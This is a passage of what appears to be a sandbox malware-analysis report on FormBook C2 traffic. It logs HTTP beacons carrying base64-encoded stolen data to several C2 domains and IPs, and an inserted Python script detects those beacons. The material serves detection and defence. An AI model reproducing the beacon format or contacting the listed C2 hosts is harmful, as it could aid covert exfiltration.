                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
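
The sessions above share one request shape regardless of host: a four-character directory (/xxr1/, /sgdd/, /rq1s/), a fixed UCWEB mobile User-Agent sent from a Windows host, Connection: close, a GET whose query string is one long base64 blob plus a short second parameter, and POSTs whose body is a single base64 form field of 204, 224 and then roughly 10 KB, with Origin and Referer pointing at the C2 path itself. The replies (a generic nginx 404, a parked-domain redirect page) are no reason to dismiss the traffic: FormBook walks a list of configured domains of which most are decoys, so detection has to key on the request, not on the response. The script below is an added example and is not part of the Joe Sandbox report. It re-types the requests above (method, path, query string, the headers the checks use, and the complete 204- and 224-byte bodies; the truncated 10304-byte bodies are left out), adds one constructed www.example.com request as a negative control, and flags the FormBook-style ones. The indicator names and thresholds are this example's own choices, not anything taken from the malware.

```python
# Added example, not part of the Joe Sandbox report: a heuristic classifier
# for the FormBook-style HTTP beacons in the sessions above. Sample requests
# are re-typed from the report; the www.example.com request is a constructed
# negative control. Indicator names and thresholds are this example's choices.
import re
from collections import defaultdict
from urllib.parse import urlsplit

UCWEB_UA = ("UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 "
            "UCBrowser/9.9.0.543 U2/1.0.0 Mobile")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")          # /xxr1/, /sgdd/, /rq1s/
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")    # raw base64, not percent-encoded


def split_form(data):
    """Split k=v&k2=v2 without URL-decoding: '+' and '/' are literal in these bodies."""
    return [tuple(f.partition("=")[::2]) for f in data.split("&") if f]


def parse_request(raw):
    """Parse one raw HTTP request (LF line endings) into a small dict."""
    head, _, body = raw.strip("\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def b64_blob(value, min_len=64):
    """True for a base64-looking string of at least min_len chars and 4-aligned length."""
    return len(value) >= min_len and len(value) % 4 == 0 and bool(B64_RE.match(value))


def beacon_indicators(req):
    """Return the FormBook-style traits one request exhibits."""
    hits, url, h = [], urlsplit(req["target"]), req["headers"]
    host = h.get("host", "")
    if PATH_RE.match(url.path):
        hits.append("four_char_path")
    if h.get("user-agent") == UCWEB_UA:
        hits.append("ucweb_user_agent")
    if h.get("connection", "").lower() == "close":
        hits.append("connection_close")
    if req["method"] == "GET":
        q = split_form(url.query)          # one long blob plus one short tag
        if len(q) == 2 and b64_blob(q[0][1]) and len(q[1][1]) <= 8:
            hits.append("get_beacon_query")
    elif req["method"] == "POST":
        q = split_form(req["body"])        # a single base64 form field
        if len(q) == 1 and b64_blob(q[0][1]):
            hits.append("post_beacon_body")
        # Origin/Referer name the C2 path itself; a browser form post would not
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{url.path}":
            hits.append("self_referential_origin")
    return hits


def is_formbook_like(req):
    """Path shape plus the fixed UA plus either beacon encoding counts as a hit."""
    hits = set(beacon_indicators(req))
    return {"four_char_path", "ucweb_user_agent"} <= hits and \
        bool(hits & {"get_beacon_query", "post_beacon_body"})


def summarize(raw_requests):
    """Host -> [(method, body length)] for every flagged request, in order."""
    out = defaultdict(list)
    for raw in raw_requests:
        req = parse_request(raw)
        if is_formbook_like(req):
            out[req["headers"]["host"]].append((req["method"], len(req["body"])))
    return dict(out)


def get_request(host, path, query):
    return (f"GET {path}?{query} HTTP/1.1\nHost: {host}\nConnection: close\n"
            f"User-Agent: {UCWEB_UA}\n")


def post_request(host, path, body):
    return (f"POST {path} HTTP/1.1\nHost: {host}\nOrigin: http://{host}\n"
            f"Referer: http://{host}{path}\nContent-Length: {len(body)}\n"
            f"Connection: close\nContent-Type: application/x-www-form-urlencoded\n"
            f"User-Agent: {UCWEB_UA}\n\n{body}")


# Re-typed from sessions 0, 1, 2, 4 and 5 above; the last entry is constructed.
SAMPLE_REQUESTS = [
    get_request("www.nb-shenshi.buzz", "/xxr1/", "BTPDLZX=CTzPrZCB9Fii6KjTMWJ2M/WncddfpG5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66jciILoGQdVc74SRxgXHJUi2AjDZRtSfQFA=&WnQdf=JhLPW"),
    post_request("www.laohub10.net", "/sgdd/", "BTPDLZX=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLerCQbFIajvkXbVH4vheu+GDMiqmgd1iYAw=="),
    post_request("www.laohub10.net", "/sgdd/", "BTPDLZX=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGn//tvUQ2fRb3FqdlAFiy1sGEx6SGt/0ac="),
    get_request("www.laohub10.net", "/sgdd/", "BTPDLZX=n1rc2pzYlnLUqZJl2DrPSNjVvvG+B3kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSkv0BSFGr8wnshHLEWZTEWF2XmR1RoCWC90=&WnQdf=JhLPW"),
    post_request("www.xcvbj.asia", "/rq1s/", "BTPDLZX=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJ2+FMk2Gglm1rWxh+DzpMM3CU/ZoS2U7nw=="),
    "GET /index.html HTTP/1.1\nHost: www.example.com\nConnection: keep-alive\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\n",   # constructed control
]

if __name__ == "__main__":
    for host, seq in summarize(SAMPLE_REQUESTS).items():
        print(host, seq)
```

Run directly, the script prints, per host, the sequence of flagged requests with their body sizes, which for www.laohub10.net reproduces the 204, 224 and (had the truncated body been included) 10304-byte progression seen in sessions 1 to 3. The same functions can be fed requests reassembled from a PCAP or proxy log. The path regex and length thresholds are deliberately loose; the fixed User-Agent is the strongest single signal in this sample but should not be assumed constant across builds, which is why the classifier also requires the path shape and the base64 encoding before it flags a request.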


                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                   7 | 192.168.2.4 | 49775 | 149.88.81.190 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                   Dec 4, 2024 12:50:12.153475046 CET | 10847 | OUT | POST /rq1s/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.xcvbj.asia
                                                                  Origin: http://www.xcvbj.asia
                                                                  Referer: http://www.xcvbj.asia/rq1s/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 57 75 6f 30 52 57 31 7a 57 32 49 63 50 6f 4c 5a 4d 76 51 32 51 79 33 4f 30 57 55 56 79 57 63 4b 31 64 6c 77 59 59 55 37 4b 4c 4e 49 54 43 4d 6d 73 79 4d 5a 41 50 78 6f 4a 63 65 6f 71 6d 4b 59 51 2f 6b 65 65 43 4e 6f 32 73 6f 44 46 72 37 64 64 4b 79 2f 58 37 31 77 4b 74 4b 45 6b 2f 57 79 78 34 4f 2f 79 37 46 53 69 74 75 30 35 78 67 68 38 4f 36 7a 41 47 38 64 37 46 2b 58 6a 51 2b 67 6e 6d 57 55 50 71 6e 4f 6e 55 57 71 46 66 35 4a 39 4b 70 73 2f 4f 66 6e 37 63 43 39 6f 51 6a 6e [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=[TRUNCATED]
                                                                  Dec 4, 2024 12:50:13.700366974 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:13 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  8 | 192.168.2.4 | 49784 | 149.88.81.190 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:14.836179972 CET | 481 | OUT | GET /rq1s/?WnQdf=JhLPW&BTPDLZX=8hQq9qCyJ4Zif0sZJ+qpsVVSiE3f8un3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1d98q0hIrZL7k5AWWxKgNnUzBpRStLOb73o= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.xcvbj.asia
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:50:16.311793089 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:16 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  9 | 192.168.2.4 | 49802 | 85.159.66.93 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:22.552916050 CET | 754 | OUT | POST /rum2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.soainsaat.xyz
                                                                  Origin: http://www.soainsaat.xyz
                                                                  Referer: http://www.soainsaat.xyz/rum2/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 37 67 51 46 31 75 31 4c 72 72 43 79 77 75 6b 77 76 76 70 72 67 7a 75 73 35 2b 69 71 36 56 44 72 51 3d 3d
                                                                  Data Ascii: BTPDLZX=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRo7gQF1u1LrrCywukwvvprgzus5+iq6VDrQ==


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  10 | 192.168.2.4 | 49808 | 85.159.66.93 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:25.216082096 CET | 774 | OUT | POST /rum2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.soainsaat.xyz
                                                                  Origin: http://www.soainsaat.xyz
                                                                  Referer: http://www.soainsaat.xyz/rum2/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 58 64 78 2b 33 57 6e 35 6f 4b 77 56 65 33 55 79 6d 34 68 6e 33 72 7a 46 4a 72 37 41 4d 62 53 41 45 3d
                                                                  Data Ascii: BTPDLZX=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gXdx+3Wn5oKwVe3Uym4hn3rzFJr7AMbSAE=


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  11 | 192.168.2.4 | 49816 | 85.159.66.93 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:27.880558014 CET | 10856 | OUT | POST /rum2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.soainsaat.xyz
                                                                  Origin: http://www.soainsaat.xyz
                                                                  Referer: http://www.soainsaat.xyz/rum2/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 62 32 34 53 4f 71 78 66 57 70 75 68 50 6c 6d 4a 48 54 67 5a 77 6b 35 6c 47 63 48 67 6d 76 39 33 6a 6c 2f 43 34 75 6f 77 6b 46 52 57 45 64 65 71 74 50 76 6f 4b 68 67 74 73 37 63 41 59 6b 52 2b 54 35 6a 45 46 54 44 6b 52 36 34 68 6a 51 71 4b 7a 6d 56 42 71 53 35 53 55 57 46 2b 58 35 65 71 50 62 59 63 55 45 33 57 54 4d 34 39 44 48 53 69 68 64 54 4e 6a 6a 62 65 34 71 52 79 75 39 49 50 75 48 46 68 35 34 6c 46 2b 32 55 4c 78 75 41 33 74 4b 77 55 41 4b 79 4d 61 62 64 71 31 75 4d 56 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=[TRUNCATED]


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  12 | 192.168.2.4 | 49825 | 85.159.66.93 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:30.539558887 CET | 484 | OUT | GET /rum2/?BTPDLZX=xMZmeyR85UPBdQXFJZqJIEL01VnkhEfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBnlxZg+0WQQuds7/7InpDF8b2KXLH9po+SKk=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.soainsaat.xyz
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:50:31.856322050 CET | 225 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx/1.14.1
                                                                  Date: Wed, 04 Dec 2024 11:50:31 GMT
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  X-Rate-Limit-Limit: 5s
                                                                  X-Rate-Limit-Remaining: 19
                                                                  X-Rate-Limit-Reset: 2024-12-04T11:50:36.6409840Z


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  13 | 192.168.2.4 | 49841 | 185.27.134.144 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:37.639204025 CET | 748 | OUT | POST /d9ku/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.amayavp.xyz
                                                                  Origin: http://www.amayavp.xyz
                                                                  Referer: http://www.amayavp.xyz/d9ku/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 4b 78 68 59 48 33 4a 68 6f 30 74 33 35 72 4f 38 48 67 6c 4e 47 51 36 4c 67 34 36 43 38 62 70 63 67 3d 3d
                                                                  Data Ascii: BTPDLZX=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtKxhYH3Jho0t35rO8HglNGQ6Lg46C8bpcg==
                                                                  Dec 4, 2024 12:50:38.879081964 CET | 682 | IN | HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:38 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                  Cache-Control: no-cache
                                                                  Content-Encoding: br
                                                                  Data Raw: 31 62 38 0d 0a a1 f0 19 00 20 d3 72 fa fa 72 cc c2 85 08 9a d0 94 cc fc b5 fe a6 58 dd 37 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 a9 3b 3d d4 aa 05 f0 93 8a f6 0c 93 99 09 8b b4 bf 80 a0 6e 66 37 66 ca d7 73 29 cb 09 46 ce 22 f2 00 a7 82 fe fc ae bc 1f 32 59 94 a6 28 eb 60 23 48 95 09 ee c0 61 49 7b 4c 24 42 ff 10 f7 c3 ff 14 89 a7 b0 8d d0 01 ae 15 af 3f bf b1 d7 44 eb 5d a3 69 5d 3f 3f 97 42 d1 5f fa 7b fa 17 93 b9 d6 d7 f3 b9 d9 5d ea f0 0d c1 3c 0e 1a 42 dc d6 79 d5 6e fa f7 6d af da 71 8c 42 ac 23 22 6b ff d9 fe be 84 39 6c 40 88 e2 8b 4b 09 34 88 88 5c 76 d9 1b 12 fa 5f 6f cf 68 80 fe 03 b6 a5 10 d6 28 9f 2b 43 08 f5 5c c9 d2 49 26 0a e5 ad 50 b9 e5 10 61 6b f3 5a 95 8c 73 47 43 08 a5 74 4c 29 5e aa 5c 28 2a 4a 61 b9 6a 97 f9 00 b9 c7 4c 48 27 7c 49 8c 27 92 52 45 0a c7 4d e1 49 e0 32 e4 8c 95 7c c4 95 9f b8 6d a3 27 80 29 0d 7f 7f 97 61 b1 d4 30 46 1a 22 d8 f9 eb fb 8f d4 07 37 df 4d 97 91 c3 14 1b 6c 11 8a 61 05 22 f3 43 dd ea [TRUNCATED]
                                                                  Data Ascii: 1b8 rrX7pNN57KNnv=sk%;=nf7fs)F"2Y(`#HaI{L$B?D]i]??B_{]<BynmqB#"k9l@K4\v_oh(+C\I&PakZsGCtL)^\(*JajLH'|I'REMI2|m')a0F"7Mla"C0`$.a!DC@Vupv&R8@^G3F%-7(-`2oJF(SJ3J30


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  14 | 192.168.2.4 | 49847 | 185.27.134.144 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 4, 2024 12:50:40.440781116 CET | 768 | OUT | POST /d9ku/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.amayavp.xyz
                                                                  Origin: http://www.amayavp.xyz
                                                                  Referer: http://www.amayavp.xyz/d9ku/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
